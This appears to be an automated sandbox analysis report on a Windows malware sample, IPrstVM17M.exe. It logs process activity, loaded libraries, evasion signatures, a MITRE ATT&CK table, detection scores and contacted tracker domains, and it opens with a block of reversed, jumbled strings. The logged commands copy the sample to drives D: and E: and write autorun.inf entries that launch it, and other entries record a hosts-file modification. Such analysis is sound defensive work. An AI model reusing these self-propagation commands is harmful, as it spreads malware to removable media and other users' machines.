{{dleiFgnikcaB__k>emaNniamoDsnD<dleiFgnikcaB__k>epyTnoitpyrcnE<dleiFgnikcaB__k>yeKcilbuPtcejbuS<dmctnirptratSnoitcellocdetroppusnu sirotareneG.emirP.htaM.onoMsgratnirpffogoltsalecnoNrevres5.2.4.3.101.1.048.61.2dleiFgnikcaB__k>edoc_rorre<DROWSSAP_ERIPXE_TNODEGNAHC_TNAC_DWSSAPrepleHreffuBceSelpitluMyarrAsetyBreffuBcesnoitcelloCrellortnoCniamoDegAdrowssaPmuminiMegAdrowssaPmumixaMepyTsserddArellortnoCniamoDsserddArellortnoCniamoDtsrif snmuloc eht tes esaelP1__b>shtgneLnmuloC<reifitnedIyrotceriDpadLkcabllaCetacifitreCrevreSyfireVemittrats_tegemittrats_tes0_etirW1_etirW2_etirW74.1.4.3.101.1.048.61.272.1.4.3.101.1.048.61.27.1.4.3.101.1.048.61.2pmatsemitnogoltsalnogoltsal2__b>yeKetavirProFniPteS<1__b>yeKetavirProFniPteS<0__b>yeKetavirProFniPteS<eldnaHredivorPotpyrCyeKetavirProFniPteSevirDyrotceriDemoHemaNniamoDnogoLtpircSnogoLemiTffogoLtnuoCnogoLreussillac-noitcurtsnidloh-ditcejer-noitcurtsnidloh-dienon-noitcurtsnidloh-di652ahs-htiw-asd-di422ahs-htiw-asd-ditnuoCtniopdnEqestorPcpRREIFITNEDI_XATNYS_CPRECAFRETNI_REVRES_CPRTNIOPDNE_QESTORP_CPRELBAT_HCTAPSID_CPRtniopdnEqestorPcpRtnuoCelbaThctapsiDOFNI_REVRES_LDIM1.3.2.5.1.6.3.1NWONKNU_SUTATS_NOITACOVER_RRE_CDKDERIUQER_RESU_OT_RESU_RRE_PA_BRKETACIFITREC_YFIREV_TNAC_RRE_CDKHCTAMSIM_EMAN_TNEILC_RRE_CDKEUQINU_TON_LAPICNIRP_RRE_CDKTSEUQER_EHCAC_TKT_YREUQ_BREKNWONKNU_LAPICNIRP_C_RRE_CDKTNUOCCA_TSURT_REVRESdleiFgnikcaB__k>stnetnoc<3.2.04001.048.2.12.2.04001.048.2.11.2.04001.048.2.184.1.4.3.101.1.048.61.282.1.4.3.101.1.048.61.28.1.4.3.101.1.048.61.2sepytnoitpyrcnedetroppus-sdsmdetaercnehwytitnedIrehtOfOflaheBnOtcAoTdewollA-SDsmslapicnirPytiruceSngieroF=NCstnuoccA ecivreS deganaM=NCsrellortnoC niamoD=UOlortnoctnuoccaresumetsySCetacoLDC no rorrE}3,1{d\}3{).\}3,1{d\(|}4,1{]f-aF-A9-0[}7{):}4,1{]f-aF-A9-0[(mrof lamiced ro xeh a ni ton si eulav gnirts DIUL dessaP.0 naht retaerg eb tsum 'snmuloc' - )(tilpS ]RORRE[gnirtSeniLelgnis - )(tilpS ]RORRE[}0{ : emaNresU}0{ : niamoD}0{ : epyTnogoL}0{ : dInogoL}0{ : revreSnogoL}0{ : niamoDSNDrevreSnogoL}0{ : egakcaPnoitacitnehtuA}0{ : emaNlapicnirPresU}0{ : DISresU/,,,,,,(Fvo*V&<`?*V'@g?+W&8U/+W(Fv?*V0.0.1v xEresufnoCredoc
Source: unknownProcess created: C:\Users\user\Desktop\IPrstVM17M.exe "C:\Users\user\Desktop\IPrstVM17M.exe"
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe"Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exeJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.infJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.infJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exeJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.infJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.infJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: IPrstVM17M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IPrstVM17M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IPrstVM17M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IPrstVM17M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IPrstVM17M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IPrstVM17M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: IPrstVM17M.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: IPrstVM17M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb source: IPrstVM17M.exe, bin.exe.3.dr
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb'' source: IPrstVM17M.exe, bin.exe.3.dr
Source: IPrstVM17M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IPrstVM17M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IPrstVM17M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IPrstVM17M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IPrstVM17M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bin.exeJump to dropped file
Source: C:\Users\user\Desktop\IPrstVM17M.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeWindow / User API: threadDelayed 365Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bin.exeJump to dropped file
Source: C:\Users\user\Desktop\IPrstVM17M.exe TID: 5820Thread sleep time: -365000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe TID: 5820Thread sleep time: -347000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeLast function: Thread delayed
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(C
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeCode function: 0_2_002029B0 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,IsDebuggerPresent,GetModuleFileNameA,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,GetEnvironmentVariableA,GetEnvironmentVariableA,getenv,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,memcpy,memcpy,memcpy,GetEnvironmentVariableA,memcpy,_invalid_parameter_noinfo_noreturn,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,GetEnvironmentVariableA,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,system,system,system,system,system,system,system,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,S0_2_002029B0
Source: C:\Users\user\Desktop\IPrstVM17M.exeCode function: 0_2_0020A128 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0020A128
Source: C:\Users\user\Desktop\IPrstVM17M.exeCode function: 0_2_00209D74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00209D74
Source: C:\Users\user\Desktop\IPrstVM17M.exeCode function: 0_2_0020A28D SetUnhandledExceptionFilter,0_2_0020A28D

HIPS / PFW / Operating System Protection Evasion

barindex
Modifies the hosts file
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe"Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exeJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.infJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.infJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exeJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.infJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.infJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeCode function: 0_2_00209F44 cpuid 0_2_00209F44
Source: C:\Users\user\Desktop\IPrstVM17M.exeCode function: 0_2_0020A2FC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0020A2FC

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Modifies the hosts file
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: IPrstVM17M.exe, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media		2
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		1
File and Directory Permissions Modification		OS Credential Dumping1
System Time Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory1
Query Registry		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Security Software Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets2
Process Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
Application Window Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
Peripheral Device Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
Remote System Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow12
System Information Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
IPrstVM17M.exe16%ReversingLabs
IPrstVM17M.exe14%VirustotalBrowse
IPrstVM17M.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\bin.exe100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
grabify.world2%VirustotalBrowse
stopify.co3%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://grabify.$0%Avira URL Cloudsafe
http://google.com10%Avira URL Cloudsafe
https://stopify.co/news.php?tid=JBB69H.jpg0%Avira URL Cloudsafe
https://stopify.co/news.php?tid=JBB69H.jpgm0%Avira URL Cloudsafe
https://grabify.world/news.php?tid=JBB69H.jpg0%Avira URL Cloudsafe
https://stopify.co/0%Avira URL Cloudsafe
https://stopify.co/news.php?tid=JBB69H.jpg%0%Avira URL Cloudsafe
https://grabify.world/news.php?tid=JBB69H.jpg:0%Avira URL Cloudsafe
https://grabify.world/news.php?tid=JBB69H.jpgw0%Avira URL Cloudsafe
https://stopify.co/news.php?tid=JBB69H.jpg2%VirustotalBrowse
https://grabify.world/0%Avira URL Cloudsafe
https://stopify.co/3%VirustotalBrowse
https://grabify.world/news.php?tid=JBB69H.jpg1%VirustotalBrowse
https://grabify.world/2%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
google.com
142.251.2.101
truefalse
    		high
    grabify.world
    		172.67.161.186
    		truefalseunknown
    www.google.com
    		142.250.141.104
    		truefalse
      		high
      grabify.link
      		104.26.8.202
      		truefalse
        		high
        stopify.co
        		52.173.151.229
        		truefalseunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://google.com/false
          		high
          https://grabify.world/news.php?tid=JBB69H.jpgfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://stopify.co/news.php?tid=JBB69H.jpgfalse
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://grabify.link/news.php?tid=JBB69H.jpgfalse
            		high
            http://www.google.com/sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVIPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://google.com1IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://google.com/7IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://www.google.com/BIPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://grabify.$IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://google.comIPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://grabify.link/(IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://stopify.co/news.php?tid=JBB69H.jpgmIPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://stopify.co/IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 3%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.google.com/.IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://grabify.link/news.php?tid=JBB69H.jpgwIPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://stopify.co/news.php?tid=JBB69H.jpg%IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.google.com/ws.php?tid=JBB69H.jpgIPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://grabify.world/news.php?tid=JBB69H.jpg:IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://grabify.world/news.php?tid=JBB69H.jpgwIPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023792145.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://grabify.world/IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://grabify.link/news.php?tid=JBB69H.jpgHIPrstVM17M.exe, 00000000.00000003.2023792145.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
